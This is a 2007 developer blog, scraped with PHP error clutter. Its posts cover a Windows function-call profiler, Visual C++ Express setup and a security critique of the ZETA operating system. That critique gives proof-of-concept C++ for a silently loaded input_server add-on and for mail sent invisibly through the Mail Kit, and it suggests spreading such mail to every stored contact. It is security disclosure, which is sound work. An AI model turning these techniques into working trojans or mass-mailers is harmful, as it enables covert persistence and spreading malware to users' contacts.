Strict Standards: Redefining already defined constructor for class wpdb in /www/htdocs/w006f36b/wp-includes/wp-db.php on line 49

Deprecated: Assigning the return value of new by reference is deprecated in /www/htdocs/w006f36b/wp-includes/cache.php on line 35

Strict Standards: Redefining already defined constructor for class WP_Object_Cache in /www/htdocs/w006f36b/wp-includes/cache.php on line 400

Strict Standards: Declaration of Walker_Page::start_lvl() should be compatible with Walker::start_lvl($output) in /www/htdocs/w006f36b/wp-includes/classes.php on line 534

Strict Standards: Declaration of Walker_Page::end_lvl() should be compatible with Walker::end_lvl($output) in /www/htdocs/w006f36b/wp-includes/classes.php on line 534

Strict Standards: Declaration of Walker_Page::start_el() should be compatible with Walker::start_el($output) in /www/htdocs/w006f36b/wp-includes/classes.php on line 534

Strict Standards: Declaration of Walker_Page::end_el() should be compatible with Walker::end_el($output) in /www/htdocs/w006f36b/wp-includes/classes.php on line 534

Strict Standards: Declaration of Walker_PageDropdown::start_el() should be compatible with Walker::start_el($output) in /www/htdocs/w006f36b/wp-includes/classes.php on line 553

Strict Standards: Declaration of Walker_Category::start_lvl() should be compatible with Walker::start_lvl($output) in /www/htdocs/w006f36b/wp-includes/classes.php on line 649

Strict Standards: Declaration of Walker_Category::end_lvl() should be compatible with Walker::end_lvl($output) in /www/htdocs/w006f36b/wp-includes/classes.php on line 649

Strict Standards: Declaration of Walker_Category::start_el() should be compatible with Walker::start_el($output) in /www/htdocs/w006f36b/wp-includes/classes.php on line 649

Strict Standards: Declaration of Walker_Category::end_el() should be compatible with Walker::end_el($output) in /www/htdocs/w006f36b/wp-includes/classes.php on line 649

Strict Standards: Declaration of Walker_CategoryDropdown::start_el() should be compatible with Walker::start_el($output) in /www/htdocs/w006f36b/wp-includes/classes.php on line 674

Deprecated: Assigning the return value of new by reference is deprecated in /www/htdocs/w006f36b/wp-includes/query.php on line 15

Deprecated: Assigning the return value of new by reference is deprecated in /www/htdocs/w006f36b/wp-includes/theme.php on line 505
MauriceK, caught between dev and drums » Development

February 18, 2007

What took you so long…

Category: Development — kaldor @ 7:23 pm

Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /www/htdocs/w006f36b/wp-includes/formatting.php on line 76

Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /www/htdocs/w006f36b/wp-includes/formatting.php on line 83

This is a question developers tend to ask their own code from time to time. Some weeks ago, I had to do some investigation on profiling applications for Windows derivatives at work. Although we decided to take an already existing project, I was interested in how one can catch what goes on with your code. That’s how this all started and today is part one of a series of entries about function call profiling.

Starting to read on the MSDN I found some interesting articles. When you compile your code with the /Gh option, the compiler automatically adds a call to a function with the prototype

extern "C" void __declspec(naked) _penter( void );

in the function prolog. The function prolog is actually the part of the function before variables get initialized or any code has been executed. For more information look at here.

The __declspec(naked) part describes that _penter() does not have a prolog and neither an epilog exists. This is very interesting, as a line like

int i=4;

simply does not work. The compiler will give up. So automatic variable assignments are done in the function prolog. Because of this, you have to write

 int i;
i=4;

The same applies for exiting a function. It is the /GH option described on this page. The function prototype is the same, so we use

extern "C" void __declspec(naked) _pexit( void );

.
By the way I would like to remark, that it is my personal taste to prefer extern “C” over _cdecl. They mean the same.

Now let us take a look at the assembler part. As I had nearly no clue about assembler (and to be honest I only now a little bit more by now), this was one of the most challenging parts. The MSDN docs linked above only show that you need to protect the profiled function by pushing the registers before you can do anything. The problem with this is, that we need one specific information stored in these registers. The value of ebp with some offsets is exactly the position, where the profiled function starts. With this position we can calculate the function name later.
Before I show the final version of the assembler part, one additional issue needs to be solved. For each variable you instantiate, you need to allocate the memory for it in the assembler code. Remember the function is naked, so nothing is done for you. Near to capitulation I found this. It describes, how you can use __LOCAL_SIZE for letting the compiler do the allocation for you.
Finally, when you are done do not forget to write your own epilog with freeing memory, and restoring the old registers.

unsigned int framePtr;
_asm {
   push     ebp
   mov      ebp, esp
   sub      esp, __LOCAL_SIZE
   mov DWORD PTR [framePtr], ebp
   push eax
   push ebx
   push ecx
   push edx
   push ebp
   push edi
   push esi
}
    // do stuff here
_asm {
   pop esi
   pop edi
   pop ebp
   pop edx
   pop ecx
   pop ebx
   pop eax
   mov      esp, ebp
   pop      ebp
   ret
}

So now that we have our functions, which get called when each profiled function enters or leave, we want to do something useful. So we continue on evaluating the function name. The resulted form will be ClassName::functionName.
The procedure is the following:

  • Get the module name
  • Access the symbol table
  • Get the function name
  • Clean up

If you like to take a look at the implementation, simply download the files attached to this article.

The profiler gets compiled as a static library, which then gets linked to your project you want to profile. Take care that you never compile the library with the /Gh nor /GH option, because then you would try to profile the profiler itself and will most likely end in an endless recursion.
Additionally I need to emphasize that you should not try this on large applications. As you all know, profiling slows your application down. But using printf inside of the profiler heavily kills the performance like every I/O call does. This will get fixed in a future version.

Also I would like to mention projects floating around on the web, which took also care about profiling. Take a look here and here. Both projects behave a little bit different. They use the _penter() function, but reset the return value of the profiled function. So when the function wants to returns, actually a _thunk() function gets called, which then calls _pexit(). Afterwards you need to reset the return value to the real one, otherwise things get invalid. This attempt seems to be a little bit overheaded for the current stuff and it only gains, that applications need to be compiled with /Gh and not the additional /GH flag.

If you want to try it out, download this zip file and have fun.

Next time I will have added some stuff on creating statistics and a small app displaying the results. I hope you liked the article and if you have questions or like to comment something, feel free to…

January 9, 2007

The urge to clarify…

Category: General, Development — kaldor @ 10:00 pm

Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /www/htdocs/w006f36b/wp-includes/formatting.php on line 76

Wow. During the last days this page really went popular. Much more than it ever was my intention. First it all started of at beuser, followed up by a discussion on the zeta-os.com forum itself, a post on isComputerOn and somehow it even made it up to osnews.com. Today, also Bernd Korz found some time to spend on this topic. The last post really showed me, that the BeOS community is not as dead as it seems to be most of the time. And because of this, I think I have to clarify some points of my last post.

First, it is true, that keyboard handling is not managed by the input_server when you are in KDL. This was a misinformation from my side and I would like to thank marcone to correct this. Marcus Overhagen was the first person who told it me, but I was too lazy to update. You can easily capture this in the frequency of me posting something here :)

All in all it seems like the main point of this post has been misunderstood by some people. It never was my target to show any weaknesses of hacking a ZETA machine from the outside. Basically this entry was intended to target two points mentioned in the magnussoft news:
- “The architecture does not allow to analyse the system from the outside, without notifying the user about it”.(”Die Architektur der Software vereitelt das ein System von außen durchsucht wird, ohne dass der Betreiber davon Kenntnis erlangt.”). Here I wanted to concentrate on the notifying the user aspect. Both examples, sending a mail as well as integrating an unknown plugin, can actually be done without notifying the user. This has already been mentioned also in my previous post.
- “[…], but also dialer, trojans […] are without any chance”.(”[…], sondern auch Dialer, Trojaner oder anderweitige Hackerangriffe sind […] chancenlos”). I wanted to focus on what usually a trojan does. For reference, take a look at the wikipedia entry. The email sending example was just one way of doing this.

In addition to this I want to say something about the people who stated, that for the example, user action is needed. This is true, and I never said anything else. Actually I even wrote it myself on the last post, that you have to open your mail attachment. But the point is, when an application tries to spread itself by some network stuff, on every other system the user gets notified about this. This is not the case for ZETA.

Furthermore I would like to write some notes about the fact, that all ports are closed on a default installation. This is absolutely true. But you could easily expand the add_on by some pieces of code, which are sending your IP to somewhere else and is waiting for a connection on one or multiple ports. The user does not know, which ports are opened, as he never gets asked, wether a port should be opened, or an application is allowed to open a port. It all just happens automatically. And as we all know, the user is the biggest security issue for an operating system. For more information about networking, take a look on the API at magnussoft documentation. It is not as up-to-date as when you are scanning the headers, they have much more informations, especially for UDP and TCP transfers.
Finally do not forget, that all these problems we are talking about, are applying to BeOS and Haiku also. There was a short discussion on the Haiku mailinglist, where axeld could easily name more problems, which are much deeper in the system design. So I only scratched the surface a little bit…

January 4, 2007

secure due to ignorance?

Category: Development — kaldor @ 1:16 am

Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /www/htdocs/w006f36b/wp-includes/formatting.php on line 76

It’s been a long time since I wrote an article about the Magnussoft ZETA operating system (http://www.zeta-os.com ), but today I really feel like it. After several weeks I took a look at the newspage on www.zeta-os.com and read an entry about security on Magnussoft ZETA. For non german native speakers it is about that the german home secretary Schäuble suggests that intelligence agencies should be allowed to have access to your private data on your computer at home.

Magnussoft claims that this is not doable with Magnussoft ZETA as “it is not possible to examine a system from the outside without notifying the user due to the architecture of this software” (”Die Architektur der Software vereitelt das ein System von außen durchsucht wird, ohne dass der Betreiber davon Kenntnis erlangt”).

This is really interesting news and I guess many people even believe in this. I was pretty surprised as the news article went even better and better. Magnussoft states, that it is not possible to attack a Magnussoft ZETA machine from the internet. Dialer, trojans, hack-attacks are without any chance.

So, this said, it is time to analyze these statements and you will be surprised how easy it is to show that Magnussoft ZETA has many security holes and conceptional issues.

Before you continue reading, I just want to make sure that this article is not ment to motivate anyone to develop harmful pieces of software, neither to damage magnussoft’s reputation. In addition all the informations you will get are already available on the developer documentation webpage of magnussoft itself, this is just a collection of hints, where security issues are to be solved. No deep knowledge of the operating system is needed for this. I hope that some people responsible for the development of this operating system feel like taking some work on it to assure the amount of security their marketing is already praying.

Working in the background
If you want to run some pieces of code without getting attention by the user easily, there is one point, where you can perfectly start your project. The add-on structure of Magnussoft ZETA loads all add-ons during startup of the different servers. So you have multiple chances to plug in to the system. Media Kit, Mail Kit, Translation, etc. But the most convenient way is the input server (http://www.zeta-os.com/cms/custom/API/TheInputServer.html ). This one gets started very early during the boot process and is needed in any case. Remember if you get into KDL you are still able to type. As already mentioned the input_server launches ALL add-ons, there is no check, wether the user wants specific add-ons to be loaded or not. Additionally there is no way to see, which add-ons are loaded even when the user wants to examine the system. You might want to start your own thread during construction of your add-on object or wait for some specific event.
Just for the fun, we let our system do something when the user presses ALT+c for copying an element he has selected. For people not used to this system, BeOS related operating systems use ALT as the default modifier. Before the window gets the message, the key event goes through our filter by calling the function
virtual filter_result Filter( BMessage* message, BList* outList) [virtual]
Following you can see some code, which simply repeats what has been written above:

#include
#include
#include

class NoNotifyFilter : public BInputServerFilter
{
public:
NoNotifyFilter() { }
~NoNotifyFilter() { }

status_t InitCheck() { return B_OK; }
filter_result Filter(BMessage*, BList*);
};

filter_result
NoNotifyFilter::Filter(BMessage* msg, BList*)
{
if(B_KEY_DOWN == msg->what) {
int32 mod = 0;
msg->FindInt32(”modifiers” , &mod);
if(mod & B_COMMAND_KEY) {
int32 keyValue = 0;
msg->FindInt32(”key” , &keyValue);
if (keyValue == 78) {
(new BAlert(”Hey”, “There was something going on in the background.\nHave you been notified?\n”, “Oh bummer”))->Go(NULL);
}
}
}
return B_DISPATCH_MESSAGE;
}

extern “C” { BInputServerFilter* instantiate_input_filter(); }
BInputServerFilter*
instantiate_input_filter()
{
return new NoNotifyFilter();
}

Summary:
- no startup control
- no validation for add-on rights
- no information about loaded/running add-ons

Round and round it goes
Now let’s take a deeper look at the point, that trojans are not implementable on Magnussoft ZETA. I just want to go into the section of spreading the project to other people. Once again the modular design of this operating system is your best friend. One part of the system is called the Mail Kit (http://www.zeta-os.com/cms/custom/API/TheMailKit.html ). Especially we make usage of the BMailMessage (http://www.zeta-os.com/cms/custom/API/BMailMessage.html ) class. It is said, that one big advantage of Magnussoft ZETA is that you can use the Mail Kit for configuring your accounts and then use whatever mail application you want. Even multiple ones at the same time is possible, as they all use the bindings to the system. This is really convenient for the user, if he wants to try out a new mail client as you do not have to configure your mail settings again and again. But you get into problems at that point that the Mail Kit does not check wether an application is allowed to use the Mail Kit. Once again: The user does not get notified about this. So we create a BMailMessage object, and just use it’s member function
status_t Send(bool send_now = false, bool remove_when_sent = false)
This one uses your default mail account you set up. The second argument is even more important. If you set it to true, you cannot even recognize, that you send out this mail, as it gets deleted from your out folder on your boot partition. Following you can view some code snippet to send a message to someone with fullfilling the above criterias.
Now you might think, that you can easily prevent your system from sending these mails with a software firewall. But it is not the application itself, which sends the message. Each mail client just sends an email to the mail_server, which is then responsible for sending the message per SMTP. This means, that you would have to deny all mail transfer, or check each mail for admission. And I guess you are really not interested in this, as this is even more annoying that sudo’ing on a unix system.
Additionally I forget to mention one little thing. Who should you send an email? Try every address thinkable like it happens sometimes? Well, that’s not needed. Magnussoft ZETA has a central point for contact managment. It is the people folder in your home directory. There all contact informations are stored without any encryption. Names, Phone numbers, adresses, birthdates, etc. are available from there and so are email adresses. So why not just send this mail to all your friends on your contact list?
Once again some code:

#include
#include
#include

int main(int argc, char* argv[])
{
if(2>argc) {
fprintf(stderr, “You need to specify some content for the email being send.\n”);
return -1;
}
BString mailText;
for(int i=1; i
mailText += argv[i];
mailText += ” “;
}

BMailMessage *mail = new BMailMessage();
mail->AddHeaderField(B_MAIL_TO, “accountAt@domain_that_should_not_exist.com”);
mail->AddHeaderField(B_MAIL_SUBJECT, “special present”);
mail->AddContent(mailText.String() , strlen(mailText.String()));
mail->Send(true, true);

return 0;
}

Leak Summary:
- everyone can send mails
- no application signature check
- no encryption for contact data.

To summarize this little excursion to Magnussoft ZETA, it is easily possible to run code without notifying the user and really harm your system. In addition you can use a client system without any problem to spread your piece of code to other people. Once again without notifying the system’s owner. You might argue that sending out a mail will not spread your application as everyone is aware of harmful code being attached to a mail. Well first point, you might get mail from your friend, so you trust him. Second magnussoft states, that this is not possible with Magnussoft ZETA, so why not just click on this neat attachment. Third, this is the same way lots and lots of Microsoft Windows machines get affected each day, each hour, each minute on this planet.

I cannot repeat it often enough: Please do not use this as a tutorial to write harmful code. This is nothing else than a proof-of-concept, that magnussoft has a long way to go to provide their users with that security level they want to. In my oppinion this article hopefully opens some eyes to spend some more attention on these and more issues. Still it can be a great operating system, as well as the other BeOS related operating systems will be.

Update

October 9, 2006

To nestle with Microsoft…

Category: Development — kaldor @ 10:24 pm

Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /www/htdocs/w006f36b/wp-includes/formatting.php on line 76

Some of us got to know, that since some time Microsoft offers his Visual C++ solution free as a so called “Express Edition” to every dev being interested. As I am willing to get into DirectX development (specially audio stuff), I thought, this might be the perfect point to start.

Being a litte bit overmotivated I installed the German Version, which is not that bad, but if you get used to work with english applications, you might get confused by not knowing, what for instance some options may mean in your native language :)

To get started, you basically need these things:

This is a lot of stuff to download and install, so be prepared, that it might take some time. Imagine we have everything installed by now, great. So we can start… No! We cannot. As Microsoft offers its stuff for free, of course you are not able to develop a Win32 Windows Application with it. “What the …?” you might think, and yes, I agree. Luckily I found a great article at the Microsoft Webpage about how to patch everything. As there are some issues with it and I do not know, how long Microsoft is willing to share their knowledge, here is the working solution of how to get things set up:

  1. Update the Visual C++ Directories by modifying the VCProjectEngine.dll.express.config file located in the \vc\vcpackages subdirectory of the Visual C++ Express install location. Please make sure that you also delete the file “vccomponents.dat” located in the “%USERPROFILE%\Local Settings\Application Data\Microsoft\VCExpress\8.0″ if it exists before restarting Visual C++ Express Edition. (The last step was not needed in my case)
  2. Edit corewin_express.vsprops file (found in C:\Program Files\Microsoft Visual Studio 8\VC\VCProjectDefaults) to AdditionalDependencies=”kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib”
  3. Edit AppSettings.htm in “%ProgramFiles%\Microsoft Visual Studio 8\VC\VCWizards\AppWiz\Generic\Application\html\1033\” by outcommenting these lines:

// WIN_APP.disabled = true;
// WIN_APP_LABEL.disabled = true;
// DLL_APP.disabled = true;
// DLL_APP_LABEL.disabled = true;

Note: In the last step the folder was called 1031 and not 1033 in my case. But it worked nethertheless. It is strange, that you have to select Console Application to create a GUI project, but it is working. Maybe there are some additional tweaks possible to transform the wizards in a more senseful way.

Ok, now he set everything up, fire up the first testproject and build it, now we should see a nice GUI, shouldn’t we? No, of course we do not. All you see is an error, that the C Runtime is missing (MSVCR80D.dll). So I needed to cheat there also. You can find this file somewhere in your Visual Studio folder. Of course nicely hidden. Copy it to system32 and fire up the build again. Damn it! Now we get another error. Browsing through the web gives you the result, that you should only build your application in Release version. Nice idea, we are great developers, but debugging might still be a nice thing to do in the meantime. After some time I realized there are only two options you need to change to be finally able to debug your application.

  1. disable incremental linking in the Linker options of the project (this pushes another linking warning, which you can get rid of by the next step)
  2. Set the debugging information format to generate a pdb file (compile option /Zi). The default is /ZI which enables /EDITANDCONTINUE which got us into trouble.

Release Builds were no problem even before, but now everything should be set up.

At a first look the Visual C++ compiler is much faster than the MinGW solution, which is a port of gcc for Microsoft Windows. Additionally it does not block the system like MinGW does. For instance I am able to use my DVB-T card and watch TV while compiling. That is not possible with gcc.

I hope that these steps may help you setting up everything faster, if you might get into the same troubles.

That was all for tonight, until next time…